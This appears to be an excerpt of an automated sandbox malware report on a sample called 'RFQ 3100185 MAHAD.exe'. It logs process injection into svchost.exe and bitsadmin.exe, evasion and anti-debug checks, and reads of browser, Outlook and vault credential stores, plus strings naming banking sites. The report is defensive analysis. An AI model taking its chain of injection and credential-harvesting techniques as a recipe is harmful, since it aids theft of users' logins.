                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007EB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_007EB134
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007FE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_007FE1FD
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,1_2_007F6532
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_0080C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,1_2_0080C18C
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007B406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_007B406B
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut20C1.tmpJump to behavior
                Source: RFQ 3100185 MAHAD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bitsadmin.exe, 0000000B.00000002.3131094091.0000000002C56000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000003.1703945631.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000002.3131094091.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000003.1703820112.0000000002C07000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000002.3131094091.0000000002C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RFQ 3100185 MAHAD.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"Jump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: RFQ 3100185 MAHAD.exeStatic file information: File size 1216000 > 1048576
                Source: RFQ 3100185 MAHAD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: RFQ 3100185 MAHAD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: RFQ 3100185 MAHAD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: RFQ 3100185 MAHAD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: RFQ 3100185 MAHAD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: RFQ 3100185 MAHAD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: RFQ 3100185 MAHAD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000007.00000003.1487758942.0000000003248000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1487651668.000000000321A000.00000004.00000020.00020000.00000000.sdmp, KOXlLfnDPX.exe, 0000000A.00000002.3131667346.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000007.00000003.1487758942.0000000003248000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1487651668.000000000321A000.00000004.00000020.00020000.00000000.sdmp, KOXlLfnDPX.exe, 0000000A.00000002.3131667346.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KOXlLfnDPX.exe, 0000000A.00000002.3130579724.000000000017E000.00000002.00000001.01000000.00000005.sdmp, KOXlLfnDPX.exe, 0000000C.00000000.1591102432.000000000017E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ 3100185 MAHAD.exe, 00000001.00000003.1288158471.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, RFQ 3100185 MAHAD.exe, 00000001.00000003.1289648146.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1421931899.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1519176573.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1420044435.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1519176573.0000000003800000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000002.3133484321.000000000322E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000002.3133484321.0000000003090000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000003.1519099763.0000000002D3F000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000003.1521761752.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ 3100185 MAHAD.exe, 00000001.00000003.1288158471.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, RFQ 3100185 MAHAD.exe, 00000001.00000003.1289648146.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1421931899.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1519176573.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1420044435.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1519176573.0000000003800000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 0000000B.00000002.3133484321.000000000322E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000002.3133484321.0000000003090000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000003.1519099763.0000000002D3F000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000003.1521761752.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp
                Source: RFQ 3100185 MAHAD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: RFQ 3100185 MAHAD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: RFQ 3100185 MAHAD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: RFQ 3100185 MAHAD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: RFQ 3100185 MAHAD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007CE01E LoadLibraryA,GetProcAddress,1_2_007CE01E
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007D6B05 push ecx; ret 1_2_007D6B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402055 push edx; iretd 7_2_00402056
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004018A1 push edx; iretd 7_2_004018A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00414930 push eax; retf 7_2_00414937
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004181E4 push ds; retf 7_2_004181E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040218B push ebp; iretd 7_2_00402192
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040D9B6 push FFFFFFEBh; iretd 7_2_0040D9BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041AA30 push edx; retf 7_2_0041AA31
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004192F1 push edx; ret 7_2_004192F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00425433 push edi; ret 7_2_00425483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00403570 push eax; ret 7_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00414658 push esp; ret 7_2_00414659
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00414E8B pushfd ; iretd 7_2_00414E91
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040A7C3 push edi; ret 7_2_0040A7F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040D7CA push ecx; ret 7_2_0040D7CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0380225F pushad ; ret 7_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038027FA pushad ; ret 7_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_038309AD push ecx; mov dword ptr [esp], ecx7_2_038309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0380283D push eax; iretd 7_2_03802858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03801368 push eax; iretd 7_2_03801369
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0309225F pushad ; ret 11_2_030927F9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030927FA pushad ; ret 11_2_030927F9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_030C09AD push ecx; mov dword ptr [esp], ecx11_2_030C09B6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0309283D push eax; iretd 11_2_03092858
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_03091344 push eax; iretd 11_2_03091369
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0074C445 push 13D671DEh; iretd 11_2_0074C44A
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_007507E1 push 00000063h; retf 11_2_00750810
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_00744C71 push ds; retf 11_2_00744C74
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_00750D0E push ds; retf 11_2_00750D14
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_00737250 push edi; ret 11_2_00737286
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_007474BD push edx; retf 11_2_007474BE
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00818111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00818111
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007CEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_007CEB42
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007D123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_007D123A
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeAPI/Special instruction interceptor: Address: 149D4F4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0387096E rdtsc 7_2_0387096E
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeEvaded block: after key decisiongraph_1-94110
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeEvaded block: after key decisiongraph_1-95181
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-94650
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 8024Thread sleep count: 45 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 8024Thread sleep time: -90000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe TID: 8048Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe TID: 8048Thread sleep time: -34500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F6CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_007F6CA9
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_007F60DD
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007F63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_007F63F9
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007FEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_007FEB60
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007FF56F FindFirstFileW,FindClose,1_2_007FF56F
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007FF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_007FF5FA
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00801B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00801B2F
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00801C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00801C8A
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00801F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00801F94
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 11_2_0074C640 FindFirstFileW,FindNextFileW,FindClose,11_2_0074C640
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_007CDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_007CDDC0
                Source: z5f52P3-.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: z5f52P3-.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: z5f52P3-.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: z5f52P3-.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: z5f52P3-.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: z5f52P3-.11.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: z5f52P3-.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: z5f52P3-.11.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: z5f52P3-.11.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: z5f52P3-.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: z5f52P3-.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: z5f52P3-.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: z5f52P3-.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: z5f52P3-.11.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: z5f52P3-.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: z5f52P3-.11.drBinary or memory string: discord.comVMware20,11696492231f
                Source: firefox.exe, 0000000D.00000002.1815985393.000001A704CCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: z5f52P3-.11.drBinary or memory string: global block list test formVMware20,11696492231
                Source: z5f52P3-.11.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: z5f52P3-.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: bitsadmin.exe, 0000000B.00000002.3131094091.0000000002BB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU$q
                Source: z5f52P3-.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: KOXlLfnDPX.exe, 0000000C.00000002.3132412125.00000000005AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
                Source: z5f52P3-.11.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: z5f52P3-.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: z5f52P3-.11.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: z5f52P3-.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: z5f52P3-.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: z5f52P3-.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: z5f52P3-.11.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: z5f52P3-.11.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: z5f52P3-.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: z5f52P3-.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: z5f52P3-.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeAPI call chain: ExitProcess graph end nodegraph_1-94233
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0387096E rdtsc 7_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417B23 LdrLoadDll,7_2_00417B23
                Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeCode function: 1_2_00806AAF BlockInput,1_2_00806AAF
